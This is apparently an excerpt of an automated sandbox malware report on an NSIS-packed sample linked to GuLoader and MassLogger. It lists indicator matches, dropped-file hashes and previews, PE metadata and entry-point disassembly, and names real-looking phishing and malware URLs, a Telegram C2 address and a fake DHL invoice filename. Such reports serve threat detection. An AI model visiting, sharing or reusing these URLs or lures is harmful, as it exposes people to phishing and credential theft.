api.telegram.org	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=	Get hash	malicious	Unknown	Browse	104.17.25.14
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	87J30ulb4q.exe	Get hash	malicious	Unknown	Browse	104.21.96.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	https://services221.com/mm/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://payhip.com/b/J12iX/purchased	Get hash	malicious	Unknown	Browse	104.17.25.14
UTMEMUS	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	iRmpdWgpoF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3pwbTZtiDu.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	87J30ulb4q.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	172.217.16.206 172.217.16.129
	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.217.16.206 172.217.16.129
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.16.206 172.217.16.129

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Unknown	Browse
	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
Category:	dropped
Size (bytes):	484658
Entropy (8bit):	7.809711763657168
Encrypted:	false
SSDEEP:	12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
MD5:	5C727AE28F0DECF497FBB092BAE01B4E
SHA1:	AADE364AE8C2C91C6F59F85711B53078FB0763B7
SHA-256:	77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
SHA-512:	5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"

C:\Users\user\AppData\Local\Iw\Forstrkkelses.Tun

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	data
Category:	dropped
Size (bytes):	135899
Entropy (8bit):	4.579822726445898
Encrypted:	false
SSDEEP:	3072:aXQ1svMV1URDliElF20S64LRi4r7nsssKKzrz:a7MVKlb20hcR3r7sF
MD5:	6069AD1E0172824C1567E52393FB0F68
SHA1:	01681DF34D7A2071EDAC58F64CA52D90CC939A4B
SHA-256:	271A1AFF20FFE024C30D1390E0CE6EABD8D34B0EAEDC27335E33369DACA99835
SHA-512:	9624941EF4EB73B5C5F01A0DB1DD488180B870DEA87A17D231363022DA02AE227D62F1F2266FD69586E7591C711A8F71800C003A0271995A13E222B221B36EB6
Malicious:	false
Reputation:	low
Preview:	............xx..5...........}.............zzzz...........w................Z.....!.[[[[[.0.............'''.............................................>>..................Z........88888...OO.???.v..........................u.................................]]....q...................................)))).11111...........uuu.......666.s..j....c.........}.........```...........??.4........===...7777.......#..XX.....{{{...........zzz...ss..............xxx.............$$.........m...............ss............999.N...NNNN..R....T..44..........666. ..>.xx......s................rr.....FFFFFFF.................AAAA.0000..............O...Z....?.. ...........................TT...............gg........`......!.......kkkkkkkk..\\...............9..........#####.........$..........jjjj.S....}}...}}..........w...CC..==......w.........C....ii..........,,,.......III..........................)...................333........mm........iiiii...----.............P...........Y....!!......VV.bbb....p."""......SSS...

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	data
Category:	dropped
Size (bytes):	112291
Entropy (8bit):	1.249420131631438
Encrypted:	false
SSDEEP:	768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
MD5:	4D1D72CFC5940B09DFBD7B65916F532E
SHA1:	30A45798B534842002B103A36A3B907063F8A96C
SHA-256:	479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
SHA-512:	048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........P............+......................................................................................................................X......n..(................G...................................m.........\|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	data
Category:	dropped
Size (bytes):	362089
Entropy (8bit):	1.23992084267325
Encrypted:	false
SSDEEP:	768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
MD5:	A4340182CDDD2EC1F1480360218343F9
SHA1:	50EF929FEA713AA6FCC05E8B75F497B7946B285B
SHA-256:	B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
SHA-512:	021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......\|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............

C:\Users\user\AppData\Local\Iw\impulserne.Kla

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	data
Category:	dropped
Size (bytes):	270677
Entropy (8bit):	7.803365573977444
Encrypted:	false
SSDEEP:	6144:SuIugLq9eO/gldl5qpOWz0uvuKpOb9IulnVZ:SuoqcM+dl5iuYAZ
MD5:	1C03E736C6F2991B60883CFBC66B5FDE
SHA1:	E72CC8B7699A50E52C23F1507B03ADEE63582E36
SHA-256:	8614F2AF5FB9768E3444A993A70718592F60581639B3C31013401ABB9AE4692F
SHA-512:	75CFB47B08B550332DBE5A72D7E8B85D877CBDCC146560018F20F9EA6F018B7F78086394FA55F7DC09BC201ECC80E73FA740F8C02D8D7A43BAABC97F1E85588F
Malicious:	false
Preview:	....................-..................[.4444..............................3...k...............8......<<<....,..%%%..<<<.........5.!!.....222................................J............mm. .i.................r............<......ZZ........WW..............z....................yy....]..ll.!!................E...NN....88.........<.qq.c....WWWWW...~~.......................................+.GGG.........LL.......\|\|..]........<...N.W.............../.....}}}.............qq................VV.................L.(...............11.......y.............t."...........l...1.a...aa......jj...............e....B.........<<...................RR.....{{............................$.D......x......a.e......mm.......D.................r.ooo..............r........=..PP..............Y.$..!............D..............v...))))...........(.CCCCCCCC..-............................JJ......~~.................=.............B.ttt...............%%%%%.....R..<<<..1......................77.....S.b..............................

C:\Users\user\AppData\Local\Iw\prepares.pli

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
Category:	dropped
Size (bytes):	139354
Entropy (8bit):	1.2473328695625903
Encrypted:	false
SSDEEP:	768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
MD5:	B0FB6B583D6902DE58E1202D12BA4832
SHA1:	7F585B5C3A4581CE76E373C78A6513F157B20480
SHA-256:	E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
SHA-512:	E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
Malicious:	false
Preview:	.......................................\|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........

C:\Users\user\AppData\Local\Temp\nst98FE.tmp

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	data
Category:	dropped
Size (bytes):	1531135
Entropy (8bit):	5.429322544077262
Encrypted:	false
SSDEEP:	24576:wHJdlHYAGo3xX3y4bz2lWwWo6rSTZyRlby:wpdlzGoBXbz2luo6rS1y/y
MD5:	81D385A87FA2177C62EDAF84BCEC2480
SHA1:	45CE57447D6357784D812EA094728500E4172EF6
SHA-256:	6499CF5EB45533482778BDD2C7A199BDF856C394F96737E9EC32FF4E2AAA149C
SHA-512:	7D61E725FE8D6F3FBAA5422475D56D9BCF6DBDF7CDD47E988103AAF38B1CF51F0358BECC563FD954E6725037AC2D40200B8D78B6146EF9EB57BBDEC7E57EA7A8
Malicious:	false
Preview:	.6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\6ZoBPR3isG.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: V7OHj6ISEo.exe, Detection: malicious, Browse Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse Filename: 6mGpn6kupm.exe, Detection: malicious, Browse Filename: v4nrZtP7K2.exe, Detection: malicious, Browse Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse Filename: 4UQ5wnI389.exe, Detection: malicious, Browse Filename: ajRZflJ2ch.exe, Detection: malicious, Browse Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse Filename: KO0q4biYfC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.960987386308478
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6ZoBPR3isG.exe
File size:	1'039'043 bytes
MD5:	dcae922f4d3c1946b3c41158be23dc2a
SHA1:	13e891bfc3bcd410b284986d7baf8672255dcbdb
SHA256:	e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7
SHA512:	ac317944427780966288021cb61caa6de9c9d13875ae1150d7076b3322b6c6d28ff1245d9c8127b3ce7144c86a5b209e87b2f29822f2e732b147811fcc241281
SSDEEP:	24576:9jwKCNK6KMnoaM5I4CSyH8xkAkXeWEhXBSqwGB7e7aP0Xl4jI61GPVSMrL:V1CvVnoatIkLs1wGaaP0XejI6cSMrL
TLSH:	0D25230DBDC4FD03C82BC9F0AD2E9A12BD2DFD079961E6A32384AD1C3D36655492CB59
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	46224e4c19391d03

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F080C9EE313h
push ebx
call 00007F080C9F15DDh
cmp eax, ebx
je 00007F080C9EE309h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F080C9F1557h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F080C9EE2ECh
push 0000000Ah
call 00007F080C9F15B0h
push 00000008h
call 00007F080C9F15A9h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F080C9F159Dh
cmp eax, ebx
je 00007F080C9EE311h
push 0000001Eh
call eax
test eax, eax
je 00007F080C9EE309h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x21068	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
